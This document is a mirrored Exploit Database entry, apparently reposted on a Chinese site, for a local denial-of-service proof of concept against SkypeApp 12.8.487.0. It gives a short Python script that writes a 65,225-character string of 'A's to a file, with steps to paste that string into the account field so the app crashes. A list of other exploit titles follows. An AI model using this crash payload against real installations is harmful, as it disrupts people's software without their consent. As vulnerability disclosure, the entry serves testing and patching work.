SkypeApp 12.8.487.0 – ‘Cuenta de Skype o Microsoft’ Denial of Service (PoC)

Exploit Database
83 阅读

作者： Luis Martínez

日期： 2018-08-24
类别：
- dos
平台：
- windows_x86-64
来源：https://www.exploit-db.com/exploits/45251/

# Exploit Title: SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-23
# Vendor Homepage: https://www.skype.com/es/home/
# Tested Version: 12.8.487.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python SkypeApp_12.8.487.0.py
# 2.- Open SkypeApp_12.8.487.0.txt and copy content to clipboard
# 3.- Open SkypeApp.exe
# 4.- Paste ClipBoard on "Cuenta de Skype o Microsoft"
# 5.- Siguiente
# 6.- Crashed

#!/usr/bin/env python
 
buffer = "\x41" * 65225
f = open ("SkypeApp_12.8.487.0.txt", "w")
f.write(buffer)
f.close()

last Exploits
SkypeApp 12.8.487.0 – ‘Cuenta de Skype o Microsoft’ Denial of Service (PoC)的更多信息

Google Chrome – Out-of-Bounds Access in RegExp Stubs：
Softros LAN Messenger 9.2 – Denial of Service (PoC)：
Halliburton LogView Pro 9.7.5 – ‘.cgm’ / ‘.tif’ / ‘.tiff’ / ‘.tifh’ Crash (PoC)：
Microsoft Windows – Uniscribe Font Processing Heap Memory Corruption in ‘USP10!MergeLigRecords’ (MS17-011)：
WebKit – ‘WebCore::FormSubmission::create’ Use-After-Free：
IrfanView 4.27 – ‘JP2000.dll’ plugin Denial of Service：
Aloaha PDF Crypter (3.5.0.1164) – ActiveX Arbitrary File Overwrite：
Sandboxie 5.18 – Local Denial of Service：